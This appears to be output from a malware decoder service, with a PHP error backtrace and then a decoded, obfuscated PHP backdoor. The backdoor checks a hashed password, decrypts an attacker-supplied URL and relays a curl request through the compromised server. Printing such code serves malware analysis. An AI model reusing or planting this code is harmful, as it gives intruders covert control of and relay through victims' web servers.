Severity: Warning
Message: copy(/var/www/malwaredecoder/index.php): failed to open stream: Permission denied
Filename: models/Decoder_model.php
Line Number: 39
Backtrace:
File: /var/www/malwaredecoder/application/models/Decoder_model.php
Line: 39
Function: copy
File: /var/www/malwaredecoder/application/models/Decoder_model.php
Line: 27
Function: check_restore_file
File: /var/www/malwaredecoder/application/controllers/Decoder.php
Line: 136
Function: decrypt
File: /var/www/malwaredecoder/index.php
Line: 315
Function: require_once
$_i='ini_set';$_e='error_reporting';$_t='set_time_limit'; $_i('display_errors', 1); $_e(e_all); $_t(0); $b64d='base64_decode';$rot='str_rot13';$xp='explode';$ig='ini_get';$sp='strpos';$ia='in_array';$ex='exit';$hb='hex2bin';$jd='json_decode';$jle='json_last_error';$stl='strtolower';$un='unpack';$fg='file_get_contents';$sb='substr';$sln='strlen'; $disabled_functions = $xp(',', $ig('disable_functions')); $suhosin_blacklist = $ig('suhosin.executor.func.blacklist'); if ($ia('eval', $disabled_functions)) { $ex("eval is disabled via disable_functions."); } elseif ($suhosin_blacklist && $sp($suhosin_blacklist, 'eval') !== false) { $ex("eval is disabled via suhosin.executor.func.blacklist."); } $expected_hash = "f2907731a34a84e704cfc24a6a1c6e95"; function decrypt_data($encrypted_data) { $b64d='base64_decode';$rot='str_rot13';$un='unpack';$hb='hex2bin';$jd='json_decode'; $decoded_base64 = $b64d($rot($encrypted_data)); $unpacked = $un("h*", $decoded_base64); $json_string = $hb($unpacked[1]); return $jd($json_string, true); } function isvalidjson($string) { $jd='json_decode';$jle='json_last_error';$stl='strtolower';$tr='trim'; if (!is_string($string) || $tr($string) === '') { return false; } $result = $jd($string); $error = $jle(); if ($error !== json_error_none) { return false; } if ($result === null && $stl($tr($string)) !== 'null') { return false; } return true; } function sendgetrequest($url, $headers = []) { $ci='curl_init';$cso='curl_setopt';$ce='curl_exec';$cerr='curl_error'; $ch = $ci($url); $cso($ch, curlopt_returntransfer, true); $cso($ch, curlopt_followlocation, true); if (!empty($headers)) { $cso($ch, curlopt_httpheader, $headers); } $response = $ce($ch); if ($response === false) { $error = $cerr($ch); return "fail: $error"; } return $response; } $fg='file_get_contents';$sb='substr';$sln='strlen';$b64d='base64_decode';$jd='json_decode';$ex='exit';$di='die';$md='md5'; $rawdata = $fg('php://input'); if (empty($rawdata) || $sln($rawdata) < 10) { $ex("invalid input"); } $rawdata = $sb($rawdata, 10); $datajson = $b64d($rawdata); if (!$datajson || !isvalidjson($datajson)) { $ex("invalid json"); } $realdata = $jd($datajson, true); if (!$realdata || !isset($realdata['passwd'], $realdata['data'])) { $di("invalid data"); } $pass2 = $md("@".$md($realdata['passwd'])."@".$md($md($realdata['passwd']))."@"); $pass3 = $md($md($pass2)); if ($pass3 != $expected_hash) { $di("errorpd"); } $data = decrypt_data($realdata['data']); if (!$data || !isset($data['link'])) { $di("invalid encrypted data"); } $url = $data['link']; $response = sendgetrequest($url); echo $response;
© 2023 Quttera Ltd. All rights reserved.